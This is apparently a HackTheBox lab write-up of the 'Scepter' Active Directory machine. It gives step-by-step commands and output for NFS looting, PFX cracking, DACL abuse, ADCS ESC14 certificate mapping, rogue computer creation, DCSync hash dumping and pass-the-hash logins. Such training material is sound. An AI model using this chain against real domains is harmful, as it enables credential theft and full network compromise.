Home » Posts » Scepter Writeup

Scepter Writeup

0x5t
0x5t avatar
Security Researcher
Team: RaptX
Posts: --
Joined: 2024
Posted:  |  Tags: HackTheBox, Windows, Active Directory, NFS, DCSync

This is a hard difficulty Active Directory machine that involves an NFS share, certificate abuse, and multiple chained DACL vulnerabilities to achieve a full domain compromise. The exploitation chain leverages an initial unauthenticated NFS share, a cracked PFX certificate, and several AD Certificate Services (ADCS) misconfigurations.

Quick Metadata

Item Value
Machine Scepter
Difficulty Hard
IP 10.10.10.10
OS Windows
Primary Vulns NFS, ADCS ESC14, DACL Abuse, DCSync

Exploitation Chain (High-Level)

  1. Exposed NFS share allows download of user certificates.
  2. The password for a PFX certificate is cracked, providing a foothold as user d.baker.
  3. AD is enumerated, revealing DACL abuses, specifically a ForceChangePassword right on user a.carter.
  4. The d.baker user, a member of IT SUPPORT, has GenericAll ACL over the STAFF ACCESS CERTIFICATE OU.
  5. The h.brown user account is compromised by modifying their mail LDAP attribute and enrolling in a certificate template, leveraging an ADCS ESC14 vulnerability.
  6. The h.brown user, a member of CMS, has Alt-Security-Identities write privileges over the HELPDESK ENROLLMENT CERTIFICATE OU, which contains the p.adams user account.
  7. An ADCS ESC14 attack is performed on p.adams to gain a certificate-based TGT.
  8. The p.adams account has DCSync privileges, allowing for a full domain compromise and access as Administrator.

Pre-Reqs

  • Tooling: nmap, showmount, certipy, john, impacket-dacledit, impacket-addcomputer, impacket-secretsdump, evil-winrm, Bloodhound.py
  • Skills: Active Directory enumeration, AD Certificate Services concepts, DACL abuse, Kerberos authentication with certificates.

Skills Required

  • Basic Active Directory enumeration
  • Working with ADCS and Certipy for certificate-based authentication
  • NFS usage and password cracking with John

Skills Learned

  • Performing ADCS ESC14 attacks by modifying the altSecurityIdentities attribute
  • Chaining DACL abuses to map certificates to different user accounts
  • Executing DCSync attacks to obtain Administrator hashes

Enumeration

Network Scan

The initial Nmap scan reveals several open ports on the target machine, which is identified as a Windows domain controller. Key services like DNS (53), Kerberos (88), MSRPC (135), LDAP (389, 636), SMB (445), and NFS (2049) are running. The domain name is identified as scepter.htb.

Nmap Commands

nmap -Pn -sC -sV -oN scans/initial.nmap 10.10.10.10
nmap -Pn -p- --min-rate 5000 -T4 -oN scans/full_tcp.nmap 10.10.10.10

Ports discovered:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  ncacn_http
636/tcp   open  ssl/ldap
2049/tcp  open  nlockmgr
3268/tcp  open  ldap
3269/tcp  open  ssl/ldap
5985/tcp  open  http
5986/tcp  open  ssl/http
9389/tcp  open  mc-nmf
47001/tcp open  http

Service-Specific Enumeration

NFS is running on port 2049. An enumeration of the NFS share reveals a /helpdesk share that is accessible to everyone.

showmount -e 10.10.10.10

The output shows:

Export list for 10.10.10.10:
/helpdesk (everyone)

Mounting the share reveals several certificate and key files.

mkdir Mount
sudo mount -t nfs -o rw,vers=3 10.10.10.10:/helpdesk Mount/
sudo ls Mount/

The mounted directory contains baker.crt, baker.key, clark.pfx, lewis.pfx, and scott.pfx.

Credentials / Artifacts Discovered

The PFX files are encrypted. The password for lewis.pfx can be cracked using john.

pfx2john lewis.pfx > lewis.hash
john -w=/usr/share/wordlists/rockyou.txt lewis.hash

The password for lewis.pfx is newpassword.

The baker.key file is also encrypted, and the same password newpassword works.

Foothold

A foothold is established by authenticating as the d.baker user. The lewis.pfx file, once cracked, reveals a revoked certificate, but the baker.crt and baker.key files can be combined and used.

First, the private key is decrypted.

openssl rsa -in baker.key -out baker-decrypted.key

Next, the decrypted key and certificate are combined to create an unencrypted PFX file.

cat baker-decrypted.key > baker.pem
tail -n36 baker.crt >> baker.pem
openssl pkcs12 -in baker.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out baker.pfx

Finally, this PFX file is used with certipy to authenticate and retrieve a TGT and the NTLM hash for the d.baker user.

certipy auth -pfx baker.pfx -domain scepter.htb -dc-ip 10.10.10.10

[*] Got TGT
[*] Saving credential cache to 'd.baker.ccache'
[*] Got hash for '[email protected]':
aad3b435651404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

Lateral Movement

As d.baker, the domain is enumerated with Bloodhound.py to identify privilege escalation paths.

python3 /opt/BloodHound.py/bloodhound.py -u 'd.baker' --hashes :18b5fb0d99e7a475316213c15b6f22ce -d scepter.htb -dc dc01.scepter.htb --zip-c All -ns 10.10.10.10

Bloodhound reveals that d.baker has a ForceChangePassword ACL on the a.carter user account. d.baker is also a member of the IT SUPPORT group, which has GenericAll rights over the STAFF ACCESS CERTIFICATE Organizational Unit (OU).

The a.carter user's password is changed.

net rpc password 'A.CARTER' 'Password1!' -S 'DC01.SCEPTER.HTB' --use-kerberos required

Next, the GenericAll ACL on the OU is abused to grant d.baker full control.

impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal d.baker -target-dn 'OU=Staff Access Certificate, DC=Scepter, DC=htb' -dc-ip dc01.scepter.htb 'scepter.htb/a.carter:Password1!' -use-ldaps

The mail LDAP attribute of the d.baker user account is then modified to [email protected].

cat modify_email.ldif

dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: [email protected]

ldapmodify -Y GSSAPI -H ldap://dc01.scepter.htb -f modify_email.ldif

A new certificate is requested for d.baker using the modified mail attribute, which now corresponds to h.brown.

certipy req -u [email protected] -k -ca SCEPTER-DC01-CA -template "StaffAccessCertificate" -target dc01.scepter.htb

This certificate is then used to authenticate as h.brown.

certipy auth -pfx d.baker.pfx -domain scepter.htb -username h.brown -dc-ip 10.10.10.10

The NTLM hash for h.brown is recovered, allowing for a remote WinRM session.

[*] Got hash for '[email protected]':
aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c

h.brown is a member of the Protected Users group, so a WinRM session is established using the TGT.

evil-winrm -i dc01.scepter.htb -r scepter.htb

The user flag is found at C:\Users\h.brown\desktop\user.txt.

Privilege Escalation

Vector 1: ADCS ESC14 via altSecurityIdentities

As h.brown, further LDAP enumeration reveals that the CMS group has write privileges (writeProperty) on the altSecurityIdentities attribute of any descendant objects within the Helpdesk Enrollment Certificate OU. The p.adams user account is the only object in this OU.

netexec ldap scepter.htb -u h.brown --use-kcache -d daclread -o TARGET_DN="OU=Helpdesk Enrollment Certificate, DC=Scepter, DC=htb" ACTION=read PRINCIPAL="CMS"

The HelpdeskEnrollmentCertificate template allows any domain computer to enroll. Since the MachineAccountQuota is 0, a new computer account is added to the STAFF ACCESS CERTIFICATE OU using the previously gained a.carter credentials.

impacket-addcomputer scepter.htb/A.CARTER:'Password1!' -dc-host dc01.scepter.htb -method LDAPS -computer-name 'PWN_PC' -computer-pass 'rSMJWvBeyAtjThzk!' -computer-group "OU=Staff Access Certificate, DC=Scepter, DC=htb"

A certificate is requested for the new computer account, PWN_PC$.

certipy req -u PWN_PC\[email protected] -p 'rSMJWvBeyAtjThzk!' -ca scepter-DC01-CA -template "Helpdesk Enrollment Certificate" -target dc01.scepter.htb

The altSecurityIdentities attribute of p.adams is modified to reflect the X509IssuerSerialNumber of the new certificate.

cat modify_altSecurityIdentities.ldif

dn: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=SCEPTER,DC=HTB
changetype: modify
replace: altSecurityIdentities
altSecurityIdentities: X509:<I>DC=htb,DC=scepter,CN=Scepter-DC01-CA<SR>0400000000008F82D76B406E0A300400000062

ldapmodify -Y GSSAPI -H ldap://dc01.scepter.htb -f modify_altSecurityIdentities.ldif

The p.adams user account is then compromised by using the PWN_PC$ certificate to request a TGT.

certipy auth -pfx pwn_pc.pfx -domain scepter.htb -username p.adams -dc-ip 10.10.10.10

The NTLM hash for p.adams is retrieved.

[*] Got hash for '[email protected]':
aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0

The p.adams user is a Replication Operator and has DCSync privileges, allowing for a full domain compromise. The Administrator hash is dumped.

impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0 scepter.htb/[email protected] -just-dc-user Administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::

Post-Exploitation (Hashes / Loot)

A remote WinRM session is established as Administrator using the retrieved NTLM hash.

evil-winrm -i dc01.scepter.htb -u Administrator -H a291ead3493f9773dc615e66c2ea21c4

Root Flag

The root flag is located at C:\Users\Administrator\desktop\root.txt.

Summary

  1. Recon: The target was identified as a Windows domain controller with an open NFS share.
  2. Foothold: An unauthenticated NFS share provided certificate files. A PFX file's password was cracked, and a new PFX was created for a different user, d.baker, to gain an initial shell.
  3. Lateral Movement: DACL enumeration revealed several misconfigurations. The d.baker user's mail attribute was modified, allowing an ADCS ESC14 attack to compromise the h.brown user account.
  4. Privilege Escalation: Further enumeration as h.brown revealed a second ESC14 vulnerability. A new computer account was created, its certificate was used to poison the p.adams user account's altSecurityIdentities, and the p.adams account was compromised.
  5. Domination: The p.adams account's DCSync privileges were abused to dump the NTLM hash for the Administrator account, leading to a full domain compromise.

Lessons Learned

  • Unauthenticated NFS shares can expose sensitive files, including certificates and keys.
  • Misconfigured AD Certificate Services can be abused through enrollment and delegation vulnerabilities.
  • Chaining Active Directory DACL abuse with ADCS misconfigurations is a powerful technique for privilege escalation and lateral movement.
  • DCSync is a critical privilege to identify and exploit for full domain compromise.

Additional Resources

Back to Posts
Contents